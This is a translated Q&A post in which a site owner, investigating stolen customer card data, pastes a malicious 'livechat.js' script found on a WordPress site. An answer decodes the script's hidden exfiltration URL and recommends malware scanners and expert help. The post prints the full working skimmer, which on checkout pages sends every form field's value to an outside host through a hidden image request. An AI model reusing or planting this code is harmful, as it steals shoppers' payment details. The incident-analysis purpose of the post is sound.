我的客户网站上的客户信用卡信息被盗。我看到该livechat.js脚本在网站上运行。该网站上没有实时聊天功能,我相信它可能是恶意软件。我如何找出脚本的起始位置以及该脚本的确切功能?
https://www.hergbenet.ro/wp-data/livechat.js
function IrDvbNXumt(e) {
return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, function(e, t) {
return String.fromCharCode(parseInt(t, 16))
}))
}
function lmVibHTBLP() {
Array.from(document.getElementsByTagName("input")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '0')") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '0');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("select")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '1');") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '1');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this), '2'") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '2');" + e.getAttribute("onchange"))
})
}
function SAcSpFtVQg(e, t) {
var n = [];
n.push("url%" + location.hostname), n.push("type:2"), "1" != t ? e.value.length > 0 && (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n)) : e.value.length > 0 && (-1 != e.id.search("zone|region|state") || -1 != e.name.search("zone|region|state")) ? (e.value.replace(/[^-0-9]/gim, ""), e.value, 0 == e.name.length ? n.push(e.id + "%" + e.options[e.selectedIndex].text) : 0 != e.name.length && n.push(e.name + "%" + e.options[e.selectedIndex].text), aQwCiGbwKo(n)) : (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n))
}
function aQwCiGbwKo(e) {
if (JSON.stringify(KZgKcnPvnh) == JSON.stringify(e)) return !1;
KZgKcnPvnh = e;
var t = 89999 * Math.random() + 1e4,
n = JSON.stringify(e),
a = document.createElement("img");
a.width = "1px", a.height = "1px", a.id = t, a.src = atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") + "?image_id=" + IrDvbNXumt(n), document.body.appendChild(a), setTimeout(document.getElementById(t).remove(), 3e3)
}
function Default_Send() {
var e = [];
e.push("url%" + location.hostname), e.push("type%2"), Array.from(document.getElementsByTagName("input")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), Array.from(document.getElementsByTagName("select")).forEach(function(t, n) {
t.value.length > 0 && (-1 != t.id.search("zone|region|state") || -1 != t.name.search("zone|region|state")) ? (t.value.replace(/[^-0-9]/gim, ""), t.value, 0 == t.name.length ? e.push(t.id + "%" + t.options[t.selectedIndex].text) : 0 != t.name.length && e.push(t.name + "%" + t.options[t.selectedIndex].text)) : 0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value)
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), aQwCiGbwKo(e)
}
var KZgKcnPvnh = [];
window.onload = function() {
-1 != location.href.search("checkout") && (Default_Send(), setInterval("Default_Send()", 3e3), setInterval("lmVibHTBLP()", 1500))
};
答案 0 :(得分:0)
您应该安装并运行Wordfence Security – Firewall & Malware Scan或Sucuri Security – Auditing, Malware Scanner and Security Hardening并检查结果。
例如,如果您对此atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")进行解码,则会看到此URL https://valdamarkdirect.com/wp-data/validation.php。这是您知道的吗?
在大多数情况下,您应该首先向客户说明该电子商店受损,然后寻求专家的帮助。